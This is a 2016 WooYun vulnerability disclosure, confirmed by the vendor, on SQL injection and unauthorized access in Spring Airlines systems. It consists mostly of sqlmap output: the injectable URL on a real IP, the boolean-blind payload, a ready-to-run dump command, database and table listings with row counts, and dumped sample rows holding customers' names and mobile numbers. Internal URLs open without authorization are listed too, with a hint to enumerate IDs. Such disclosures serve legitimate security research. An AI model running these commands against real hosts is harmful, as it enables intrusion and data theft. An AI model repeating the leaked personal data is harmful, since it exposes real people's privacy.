当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169140

漏洞标题:航空安全之春秋航空SQL注入等打包提交, 泄漏海量数据(百万订单信息\用户数据\内部文档等)

相关厂商:春秋航空

漏洞作者: harbour_bin

提交时间:2016-01-11 16:41

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-11: 厂商已经确认,细节仅向厂商公开
2016-01-21: 细节向核心白帽子及相关领域专家公开
2016-01-31: 细节向普通白帽子公开
2016-02-10: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

RT

详细说明:

1、

http://180.153.27.4:8888/new/route/route_schedule.jsp?u&u=1&q_routeid=42771


注入点: q_routeid 盲注
DBA权限、数据库、用户名(从数据库可以看出是春秋的、另外网页中也有显示)

[11:02:39] [INFO] resuming back-end DBMS 'oracle'
[11:02:39] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: q_routeid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: u&u=1&q_routeid=42771 AND 4670=4670
---
[11:02:39] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
[11:02:39] [INFO] testing if current user is DBA
[11:02:39] [WARNING] reflective value(s) found and filtering out
current user is DBA:    True
database management system users [36]:
[*] ANONYMOUS
[*] APPQOSSYS
[*] APPS
[*] BI_READ
[*] BI_TOUR
[*] BTRAVEL
[*] CHUNQIU
[*] CHUNQIU2
[*] CHUNQIU3
[*] CHUNQIU4
[*] CHUNQIU5
[*] CQGUID
[*] CRMDB
[*] DBSNMP
[*] DERBY_HOTEL
[*] DIP
[*] FINANCE
[*] HOTELCOMMENT
[*] LOGIN
[*] MONITOR
[*] MONITOR2
[*] MQ
[*] MQ2
[*] OAG
[*] ONLINEDB
[*] ORACLE_OCM
[*] ORDERDB
[*] OUTLN
[*] PRODUCTDB
[*] SYS
[*] SYSTEM
[*] TOUR
[*] WECHATDB
[*] WMSYS
[*] XDB
[*] XS$NULL
available databases [28]:
[*] APPQOSSYS
[*] APPS
[*] BTRAVEL
[*] CHUNQIU
[*] CHUNQIU2
[*] CHUNQIU3
[*] CHUNQIU4
[*] CHUNQIU5
[*] CQGUID
[*] CRMDB
[*] DBSNMP
[*] FINANCE
[*] HOTELCOMMENT
[*] LOGIN
[*] MONITOR2
[*] MQ
[*] MQ2
[*] OAG
[*] ONLINEDB
[*] ORDERDB
[*] OUTLN
[*] PRODUCTDB
[*] SYS
[*] SYSTEM
[*] TOUR
[*] WECHATDB
[*] WMSYS
[*] XDB


证明危害程度, 跑了部分数据, 东西太多了, 不一一跑了

Database: CHUNQIU (数据量很大)
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| TBC_RP_CHANNEL                 | 15421067 |
| TBC_RP_CHANNEL_1007            | 14671619 |
| RECEPTIONORDERTOURISTLIST      | 2715351 |
| MESSAGEBOARD                   | 2451570 |
| F_FTCONTROL_HIS                | 2091578 |
| NETINSCHECKRECORDER            | 1929755 |
| TB_NETINSURANCE                | 1880966 |
| RECE_GROUPSCHEDULE             | 1595737 |
| TB_INSURED                     | 1552746 |
| RESOURCE_TRAFFIC_ORDER         | 1508648 |
| DGROUPFLOW                     | 1435419 |
| F_FTCONTROL                    | 1037837 |
| H_FIRM_GROUP                   | 735159  |
| F_HOTELORDERDETAIL             | 633021  |
| RECEPTIONORDER                 | 608697  |
| TBC_ROUTE_CHANNEL              | 497502  |
| FLIGHT_SALE                    | 466494  |
| RECEP_SCHEDULE                 | 459895  |
| TB_CREDIT_CUSTOMER             | 453162  |
| DG01                           | 412612  |
| R_ROUTEPLAN_SCHEDULE           | 406140  |
| R_ORDER_LINE                   | 398298  |
| DJ_BRANCH                      | 374662  |
| RECE_STANDARD                  | 350724  |
| RECEP_SCENE_ARRA               | 343802  |
| RECEP_SCENE_COST               | 334070  |
| MESSAGEBOARD_H1                | 330486  |
| BAK_ROUTEPLANSCHEDULE          | 321128  |
| TB_CREDIT_LOG                  | 304121  |
| RECEP_ORDER_GROUP              | 291378  |
| RECEP_ORDER_GROUP2             | 254828  |
| RECEP_SPECIALPRICE             | 250521  |
| F_HOTEL_ORDER                  | 248812  |
| IM_MESSAGE                     | 245913  |
| RECEP_RESTAURANT_COST          | 242819  |
| RECEPGROUPINCOME               | 221155  |
| RECEPTIONGROUP                 | 210643  |
| RECEPTIONGROUPINFO             | 210448  |
| USERFUNC                       | 210024  |
| RECEP_HOTEL_COST               | 200948  |
| R_ROUTEPLAN_GOAL               | 198435  |
| BAK_ORDER_CHILD_LIST           | 186280  |
| RECEP_HOTEL_ARRA               | 182469  |
| RECEP_RESTAURANT_ARRA          | 177022  |
| RECEP_ORDER_GROUP1             | 175320  |
| AFFICHE                        | 172069  |
| TB_CREDIT                      | 153068  |
| INSURANCE                      | 149259  |
| BAK_ORDER_HISTORY              | 148081  |
| TBC_FTCONTROL_CHANNEL          | 142118  |
| RECEP_SHOP_ARRA                | 137721  |
| RECEP_SHOP_COST                | 130056  |
| USERROLEFUNC_20141126          | 126942  |
| USERFUNC_20141125              | 115877  |
| USERFUNC_20141125_2            | 115877  |
| USERFUNC_20141125_1            | 115722  |
| USERFUNC_20141126              | 115722  |
| USERROLEFUNC                   | 114598  |
| USERROLEFUNC_20141125_1        | 110229  |
| R_ROUTEPLAN                    | 98140   |
| R_ROUTEPLAN_STANDARD           | 98140   |
| RECEPGROUPSETTLEMENT           | 97145   |
| RECEPGROUPSETTLEMENT1          | 97145   |
| RECEP_GROUP                    | 97021   |
| RECEP_STANDARD                 | 94587   |
| CICERONEARRA                   | 93077   |
| USERROLEFUNC_20141125_2        | 90642   |
| USERROLEFUNC_20141125          | 90640   |
| BAK_PLANCHILDRENPRICE          | 87966   |
| BAK_ROUTEPLANTRAFFIC           | 86578   |
| D_ROOMFEE_DETAIL               | 81832   |
| R_ORDER_HEAD                   | 74984   |
| BAK_ROUTEPLANTRAFFICDETAIL     | 74035   |
| AAA                            | 72597   |
| CALL_BOARD_H2                  | 70707   |
| RECEP_MOTO_COST                | 68221   |
| INSURANCE_COSTOMER             | 68014   |
| DY_INGROUP                     | 66127   |
| ORDEROPHISTORY                 | 64132   |
| TB_CREDITBAK                   | 58716   |
| BAK_ROUTEPLAN                  | 54619   |
| F_ORDER                        | 54355   |
| BAK_ROUTEPLANRECEPTION         | 52705   |
| BAK_ROUTEPLANBRANCH            | 52562   |
| RECEP_OTHER_COST               | 50093   |
| ORDERCOST                      | 48575   |
| ROUTEPLAN_UPDATE               | 47442   |
| RECEP_COST_COUNT               | 46342   |
| RECEP_MOTO_ARRA                | 40750   |
| BAK_SIGNORDER                  | 39427   |
| TB_SECURITYS                   | 38921   |
| ROUTEPLANSCHEDULE              | 37394   |
| F_HOTEL_ROOMTYPE               | 37125   |
| F_HOTEL_ROOMTYPE_BAK           | 35109   |
| CALL_BOARD                     | 31895   |
| SCHEDULED_FLIGHT_SALE_REPORT   | 31389   |
| SCHEDULED_FLIGHT_SALE_REPORT2  | 31389   |
| ORDERTOURISTLIST               | 30544   |
| ORDERTICKET                    | 29020   |
| ROUTEPLAN_BUS                  | 27927   |
| RECEP_OTHER_ARRA               | 27503   |
| TB_CREDIT_BAK1126              | 24801   |
| BAK_ORDER_RECERVER             | 21593   |
| F_FTCONTROL_HIS_BACK           | 20399   |
| R_RECEP_GROUP_ARR              | 20262   |
| USERS                          | 18329   |
| CHAINED_ROWS                   | 16906   |
| USERFUNC_BACK_070313           | 15908   |
| CALL_BOARD_H                   | 15846   |
| USERFUNC_BAK070305             | 15248   |
| USERS_20141125                 | 14920   |
| USERS_MAPPING_20140928         | 14486   |
| USERS_BAK                      | 13880   |
| RECEP_SHOP                     | 13779   |
| BAK_ORDER_GROUP                | 11802   |
| F_HOTELORDERPRICE              | 11647   |
| F_HOTEL                        | 11119   |
| OL_R_ORDER_LINE_HIS            | 10945   |
| USERS_MAPPING                  | 10492   |
| ROUTESCHEDULE                  | 10403   |
| F_HOTELORDERGUEST              | 10233   |
| PLANCHILDRENPRICE              | 10204   |
| D_ROOM_STATE                   | 9176    |
| ROUTEPLANTRAFFIC               | 8578    |
| NETINSCHECKREC                 | 8388    |
| R_RECEP_GROUP                  | 8340    |
| ROUTEPLANTRAFFICDETAIL         | 8132    |
| T_RESOURCE                     | 8016    |
| TRAFFICCLASS                   | 8016    |
| TRAFFICINFO                    | 8016    |
| RRP_RP                         | 7842    |
| R_ROUTE_SCHEDULE               | 7712    |
| PERSONNEL                      | 7297    |
| F_HOTELORDERHEAD               | 7281    |
| RECEP_HOTEL                    | 7277    |
| OL_R_ORDER_PAYMENT             | 7008    |
| RECEP_LOAN_COST                | 6857    |
| ROUTEPLANSCENE                 | 6853    |
| ROUTEPLAN                      | 6762    |
| SIGNORDER                      | 6515    |
| DEPT_FUNC                      | 6473    |
| PLANEINFO                      | 6425    |
| GROUPSETTLEMENT                | 6244    |
| ROUTEPLANBRANCH                | 5959    |
| ROUTEPLANRECEPTION             | 5925    |
| AGENCY                         | 5599    |
| BAK_TRAVELGROUP                | 5223    |
| TBC_ROOMTYPE_CHANNEL           | 4519    |
| DY_TRAINING_EXPERIENCE         | 4193    |
| OL_R_ORDER_HEAD_HIS            | 4172    |
| D_ROOMFEE                      | 3944    |
| OL_R_ORDER_LINE                | 3841    |
| USERS_BAK070305                | 3331    |
| DY_CICERONE                    | 3220    |
| ORDER_GROUP                    | 2980    |
| R_ORDER_LINE_H                 | 2941    |
| R_ROUTE_GOAL                   | 2936    |
| ORDERRECEIVERECORD             | 2909    |
| RECEP_RESTAURANT               | 2883    |
| RECEPGROUPCOST                 | 2844    |
| D_HOTEL_ROOM                   | 2241    |
| ROUTETRAFFIC                   | 2210    |
| USER_GROUP                     | 2206    |
| HOTEL                          | 2072    |
| ROUTETRAFFICDETAIL             | 2061    |
| CHILDRENPRICE                  | 2056    |
| ROUTE                          | 1897    |
| RECEP_VIHICLE                  | 1842    |
| ROUTE_UPDATE                   | 1811    |
| R_ROUTE                        | 1804    |
| R_ROUTE_STANDARD               | 1752    |
| R_ORDER_HISTORY                | 1746    |
| DY_CICER_GROUP_SEQ             | 1689    |
| USERS_RELATED                  | 1571    |
| CITY                           | 1522    |
| FUNCITEMS_IN                   | 1521    |
| FUNCITEMS                      | 1448    |
| OL_R_ORDER_HEAD                | 1424    |
| FUNCITEMS_20141125             | 1415    |
| ROUTERECEPTIONQUOTE            | 1332    |
| TRAVELGROUP                    | 1330    |
| ROUTEBRANCH                    | 1324    |
| DEPARTMENTS                    | 1322    |
| SCENE                          | 1319    |
| TRAININFO                      | 1300    |
| SCENE_BAK1126                  | 1280    |
| RESTAURANT                     | 1172    |
| TESTQIU                        | 1169    |
| CITY_BAK1126                   | 1159    |
| TBC_HOTEL_CHANNEL              | 1141    |
| DEPARTMENTS_20141125           | 1116    |
| RESTAURANT_BAK1126             | 1102    |
| ROOMTYPE                       | 858     |
| DEPT_MANAGE                    | 843     |
| RECEP_SCENE_COST_SUBGROUP      | 843     |
| ROOMFEE                        | 830     |
| RECEP_SCENE_ARRA_SUBGROUP      | 804     |
| ROUTEPLANHOTEL                 | 763     |
| CUSTOMER                       | 731     |
| CICERONEDETAIL                 | 707     |
| MOTORTYPE                      | 706     |
| DY_RESUMN                      | 686     |
| SYSTEMROLES                    | 675     |
| SYSTEMROLES_20141125           | 661     |
| RECEP_RESTAURANT_ARRA_SUBGROUP | 572     |
| TEMP_5                         | 564     |
| FUNCITEMS_BACK                 | 544     |
| FUNCITEMS_BAK070305            | 544     |
| R_ORDER_HEAD_H                 | 502     |
| SETTING                        | 492     |
| FUNCITEMS_BACK_070313          | 479     |
| F_HOTEL_PAY                    | 469     |
| TBC_CHANNEL                    | 446     |
| SHOP                           | 441     |
| SYSTEMROLES_BAK070305          | 440     |
| SHOP_BAK1126                   | 428     |
| DY_REWARDS_PUNISHMENTS         | 398     |
| BK_TEMP_TABLE_20100818         | 378     |
| RECEP_RESTAURANT_COST_SUBGROUP | 351     |
| DY_CICER_TRAINING              | 349     |
| D_ORDER_FAX                    | 334     |
| D_ORDER                        | 315     |
| D_ORDER_LINE                   | 297     |
| RECEPTIONSUBGROUP              | 280     |
| MOTORCADE                      | 273     |
| INSURANCE_TYPE                 | 256     |
| GROUP_FUNC                     | 255     |
| RECEP_SHOP_COST_SUBGROUP       | 253     |
| SMSBOX                         | 241     |
| MOTORCADE_BAK1126              | 238     |
| F_HOTEL_TYPE                   | 224     |
| TB_CONTRACT                    | 221     |
| NETINSCHECKRECORDER_EXCEPTION  | 220     |
| PERSONNEL_SHMS                 | 220     |
| ROUTESCENE                     | 220     |
| USERS_SHMS                     | 220     |
| COUNTRY                        | 201     |
| COUNTRY_IN                     | 201     |
| OTHERRESOURCEDETAIL            | 200     |
| SHIPINFO                       | 199     |
| OTHERRESOURCE                  | 176     |
| BRANCH                         | 168     |
| OTHERRESOURCE_BAK1126          | 163     |
| ROUTETYPE                      | 153     |
| FLIGHT_PLAN                    | 151     |
| TRAFFICPRICE                   | 147     |
| PROVINCE                       | 136     |
| DY_CICERTRAIN_SCORE            | 133     |
| TEMP_6                         | 127     |
| TEMP_7                         | 126     |
| TB_DICTIONARY                  | 123     |
| RECEP_OTHER_ARRA_SUBGROUP      | 120     |
| TEMP1                          | 118     |
| DY_SETTING                     | 113     |
| RECEP_OTHER_COST_SUBGROUP      | 104     |
| BRANCH_20141125                | 102     |
| RECEP_HOTEL_COST_SUBGROUP      | 101     |
| TB_DICTIONARY_BAK              | 97      |
| FLIGHT_GRADE                   | 59      |
| EXCEPTIONRECORD                | 56      |
| RECEP_HOTEL_ARRA_SUBGROUP      | 56      |
| F_HOTEL_PRICE                  | 50      |
| DY_TRAINING                    | 49      |
| DEPARTMENTS_SHMS               | 48      |
| ROUTEHOTEL                     | 46      |
| RECEPGROUPCOSTINFO             | 41      |
| FLIGHT_GRADE_STAND             | 35      |
| PARAMETERS                     | 34      |
| BRANCH_DAY_REPORT              | 30      |
| INSURANCE_CANCEL               | 30      |
| RECE_GROUPHOTEL                | 29      |
| RECE_GROUPVEHICLE              | 27      |
| FEETYPE2                       | 24      |
| ORDER_CUST                     | 23      |
| RECE_GROUPRESTAURANT           | 20      |
| TBC_ACTION                     | 19      |
| RECE_GROUPSHOP                 | 15      |
| DY_CICERTEST_SUBJECT           | 13      |
| IM_FRIEND                      | 12      |
| RECEP_SHOP_ARRA_SUBGROUP       | 12      |
| F_STAR                         | 11      |
| D_RANK_TYPE                    | 10      |
| FUNCTYPES                      | 9       |
| RECE_GROUPSCENE                | 9       |
| BAOTUANHEAD                    | 8       |
| BAOTUANLINE                    | 8       |
| H_RECEPTIONGROUP               | 8       |
| TB_CREDIT_SET_LOG              | 8       |
| CONTINENT                      | 7       |
| FEETYPE1                       | 7       |
| GROUPS                         | 7       |
| QUALITY_SURVEY                 | 7       |
| SCHEDULED_FLIGHT_PARAMETER     | 6       |
| INSURANCE_ORG                  | 5       |
| NETWORK                        | 5       |
| RESOURCETYPE                   | 5       |
| TB_CREDITTYPE                  | 5       |
| D_PAYMENTTYPE                  | 4       |
| T_PORT                         | 4       |
| TB_CREDIT_SET                  | 4       |
| CLASSINFO                      | 3       |
| CUS_TYPE                       | 3       |
| D_SALE_RANK                    | 3       |
| RESERVEDORDERHEAD              | 3       |
| RESERVEDORDERLINE              | 3       |
| "RECEPTIONORDER#M1"            | 2       |
| IM_ORDER_SETTING               | 2       |
| QUALITY_SURVEY_SUB             | 2       |
| RECEPTIONORDERSETTLEMENT       | 2       |
| ROOMINFO                       | 2       |
| TB_CREDIT_USE_LOG              | 2       |
| "RECEPTIONGROUP#M1"            | 1       |
| BASIC_IP                       | 1       |
| F_HOTEL_INVENTORY              | 1       |
| RECEPGROUPSETTLEDATE           | 1       |
| ROUTERESTAURANT                | 1       |
| TB_CREDIT_ACCOUNT              | 1       |
| TB_CREDIT_USE                  | 1       |
| TEST0627                       | 1       |
| TEST2011                       | 1       |
| TEST2012                       | 1       |
| TOURTYPE                       | 1       |
+--------------------------------+---------+


Database: BTRAVEL
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| BALANCE_ALL_FLIGHTS         | 1709032 |
| BALANCE_ALL                 | 1219621 |
| BALANCE_BILL_ALL            | 1185535 |
| BALANCE_ALL_REPORT          | 1170999 |
| T_RECORD_FLIGHTS            | 678671  |
| T_OPERATE_HIS               | 644726  |
| T_RESERVATION_AUTHORIZATION | 562797  |
| T_RECORD_JOURNEY            | 514012  |
| BALANCE_PNR_HIS             | 440229  |
| BALANCE_OVERMONEY_KIND      | 260804  |
| T_RESERVATION_AIRTICKET     | 258835  |
| T_RESERVATION_JOURNEY       | 258425  |
| T_RESERVATION_SUBORDER      | 257952  |
| T_SUBORDER_PNR              | 257952  |
| T_RESERVATION_ORDER_FINANCE | 255222  |
| BALANCE_ALL_CUSTOMER        | 247060  |
| T_RESERVATION_PNR           | 219529  |
| T_RESERVATION_MAINORDER     | 132687  |
| BALANCE_BILL                | 46929   |
| T_CUSTOMER_DOCUMENT         | 27317   |
| T_CUSTOMER                  | 24908   |
| T_CUSTOMER_CONTACT          | 20189   |
| T_CUSTOMER_CENTER           | 18566   |
| BALANCE_ALL_HIS             | 8062    |
| BALANCE_NET_CUSTOMER        | 4481    |
| BALANCE_NET_ORDER           | 3879    |
| T_BASIC_AIRPORTAREA         | 1521    |
| BALANCE_NET_FLIGHTS         | 1034    |
| BALANCE_CUSTOMER_INFO       | 1013    |
| T_CUSTOMER_COMPANY          | 864     |
| T_CUSTOMER_DEPARTMENT       | 741     |
| BALANCE_DEPT                | 583     |
| T_SUPPOSE_FLIGHT            | 570     |
| T_SUPPOSE_AIRTICKET         | 499     |
| T_SUPPOSE_JOURNEY           | 493     |
| BALANCE_PERSONNEL           | 123     |
| BALANCE_AIRWAYS             | 103     |
| T_DICT_ITEM                 | 45      |
| T_CONFIRM_REASON            | 30      |
| BALANCE_TICKETS_TYPE        | 25      |
| BALANCE_CUSTOMER_DEPT       | 20      |
| BALANCE_DEPT_TYPE           | 11      |
| BALANCE_CUSTOMER_GROUP      | 10      |
| BALANCE_KIND                | 9       |
| T_POLICY_REASON             | 9       |
| BALANCE_CUSTOMER_IDTYPE     | 5       |
| BALANCE_TYPE                | 3       |
| T_ACCOUNTING                | 3       |
| BALANCE_FLAG                | 2       |
| T_BALANCE_FINANCE           | 2       |
| T_CUSTOMER_POLICY           | 2       |
| T_DEPARTMENT_POLICY         | 2       |
| T_CUSTOMER_POSITION         | 1       |
| T_POLICY                    | 1       |
+-----------------------------+---------+
Database: CRMDB
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| TB_MEMBER_PASSENGER            | 7163428 |
| TB_MEMBER_ABNORMAL             | 5633946 |
| TB_MEMBER_DOCUMENT             | 4446875 |
| TB_MEMBER_BUSINESS_ASSOCIATION | 3866032 |
| TB_MEMBER_BASIC_INFO           | 2233672 |
| TB_MEMBER_B_ASSOCIATION_T      | 665485  |
| TB_MEMBER_BANDING_CAST         | 436288  |
| TB_MEMBER_LOGIN_TIME           | 96638   |
| TB_MEMBER_GROWTH               | 49367   |
| TB_MEMBER_ADDRESS              | 17867   |
| TB_MEMBER_HEAD                 | 7091    |
| TB_MEMBER_GROUP                | 402     |
| TB_MEMBER_OPERATE_LOG          | 105     |
| TB_COMMON_MST                  | 34      |
| TB_GROUP_MANAGEMENT            | 19      |
| TB_MEMBER_LABEL                | 13      |
| TB_LABEL_MANAGEMENT            | 8       |
| TB_MEMBER_INSTITUTION          | 4       |
| TB_MEMBER_BLACKLIST_DOCUMENT   | 3       |
| TB_MEMBER_INS_GROUP            | 3       |
| TB_MEMBER_BLACKLIST            | 1       |
| TB_MEMBER_INSTITUTION_BILL     | 1       |
+--------------------------------+---------+


sqlmap语句:python sqlmap/sqlmap.py -u "http://180.153.27.4:8888/new/route/route_schedule.jsp?u&u=1&q_routeid=42771" --dump --start 1 --stop 3 -T T_CUSTOMER -D BTRAVEL
证明一下数据存在(用户、订单数据等)
Database: BTRAVEL
Table: T_CUSTOMER
[3 entries]
+----+----------+------------+------------+-------------+---------------+------+
------+------+-------+--------+-------------+---------+----------+-----------+--
----------+-------------+-------------+--------------+---------------+----------
-------+-------------------+-------------------+
| ID | STAFF_ID | COMPANY_ID | CREATOR_ID | MODIFIER_ID | DEPARTMENT_ID | BL   |
 PL   | TYPE | STATE | GENDER | NAME_EN     | NAME_CN | LOCATION | VERSION   | P
OSITION   | BLUE_COLLAR | LOCAL_EXPAT | LEGAL_ENTITY | CREATION_DATE | COST_CENT
RE_SAP | MODIFICATION_DATE | EXACT_COST_CENTRE |
+----+----------+------------+------------+-------------+---------------+------+
------+------+-------+--------+-------------+---------+----------+-----------+--
----------+-------------+-------------+--------------+---------------+----------
-------+-------------------+-------------------+
| 2  | NULL     | 2009       | NULL       | 96708       | 185           | NULL |
 NULL | 1    | 0     | 1      | MA/XIAOMING | 马晓鸣     | NULL     | 2
| NULL       | NULL        | NULL        | NULL         | NULL          | NULL
          | 07-JAN-11         | NULL              |
| 3  | NULL     | 2009       | NULL       | 96998       | 164           | NULL |
 NULL | 1    | 0     | 2      | MA/YIXUAN   | 马毅璇     | NULL     | 6
| NULL       | NULL        | NULL        | NULL         | NULL          | NULL
          | 10-MAR-15         | NULL              |
| 4  | NULL     | 2009       | NULL       | 96297       | 167           | NULL |
 NULL | 1    | 1     | 1      | MIN/RUI     | 闵锐      | NULL     | 4         |
 NULL       | NULL        | NULL        | NULL         | NULL          | NULL
         | 16-FEB-12         | NULL              |
Database: BTRAVEL
Table: T_CUSTOMER_CONTACT
[3 entries]
+----+------------+-------------+-------------+-----------+-------------+-------
------+--------------+---------------+-------------------+
| ID | CREATOR_ID | CUSTOMER_ID | MODIFIER_ID | VERSION   | CONTACT_NO  | DESCRI
PTION | CONTACT_TYPE | CREATION_DATE | MODIFICATION_DATE |
+----+------------+-------------+-------------+-----------+-------------+-------
------+--------------+---------------+-------------------+
| 4  | 30017      | 24356       | 91011       | 2         | 13817835952 | NULL
      | 2            | 21-JAN-10     | 22-MAR-10         |
| 6  | 96445      | 27741       | NULL        | 1         | 13426415261 | NULL
      | 2            | 04-MAR-10     | NULL              |
| 7  | 96708      | 28717       | NULL        | 1         | 13816977534 | NULL
      | 2            | 05-MAR-10     | NULL              |
+----+------------+-------------+-------------+-----------+-------------+-------
------+--------------+---------------+-------------------+
Database: BTRAVEL
Table: BALANCE_BILL_ALL
[3 entries]
+---------+---------+----------+--------------+-----------------+---------------
--+-----------------+--------+------------+---------+-----------+------------+--
------------+--------------+---------------+---------------+----------------+---
----------------+
| DEPT_ID | BILL_ID | PLACE_ID | PERSONNEL_ID | TICKETS_TYPE_ID | DISPOSE_USER_I
D | RECOVER_USER_ID | IS_USE | BILL_NO    | AIRWAYS | USE_DATE  | IS_DISPOSE | D
ISPOSE_DATE | RECOVER_DATE | BILL_INPUT_NO | BILL_TERMINAL | DISPOSE_REMARK | BA
LANCE_BILL_TYPE |
+---------+---------+----------+--------------+-----------------+---------------
--+-----------------+--------+------------+---------+-----------+------------+--
------------+--------------+---------------+---------------+----------------+---
----------------+
| 2       | 1586    | NULL     | 96578        | 3               | NULL
  | NULL            | Y      | 4936008080 | 784     | 17-APR-07 | N          | N
ULL         | NULL         | NULL          | 0             | NULL           | NU
LL              |
| 2       | 1587    | NULL     | 96578        | 3               | NULL
  | NULL            | Y      | 4936008081 | 784     | 17-APR-07 | N          | N
ULL         | NULL         | NULL          | 0             | NULL           | NU
LL              |
| 2       | 1588    | NULL     | 96578        | 3               | 96578
  | NULL            | Y      | 4936008082 | 784     | 17-APR-07 | N          | 1
7-APR-07    | NULL         | NULL          | 0             | NULL           | NU
LL              |
+---------+---------+----------+--------------+-----------------+---------------
--+-----------------+--------+------------+---------+-----------+------------+--
------------+--------------+---------------+---------------+----------------+---
----------------+


2、未授权访问
mis系统

http://mis.9cair.com/mis2/wp/sopIndex.jsp?taskNo=M05761
http://mis.9cair.com/mis2/wp/sopServelt.do?method=showSopPriter&sopSeq=1299
通过遍历编号可进一步扩大危害
http://mis.9cair.com/mis2/wp/innerindex.jsp
http://mis.9cair.com/mis2/wp/wpServelt.do?method=getStationAndProject&printId=%271%27


foc系统

http://fcs.9cair.com/flyer/alcoholtest/view/index-success.html
http://foc.9cair.com/Frame/Dispatch/weather/weatherMonitor.do 气象地图监控数据

漏洞证明:

已证明
PS:数据太多了, 没有都跑出来, 危害还是比较大的; 若不够, 可以补充的

修复方案:

1、SQL注入, 敏感字符过滤
2、未授权访问, 验证权限

版权声明:转载请注明来源 harbour_bin@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-01-11 17:36

厂商回复:

谢谢,已收到

最新状态:

暂无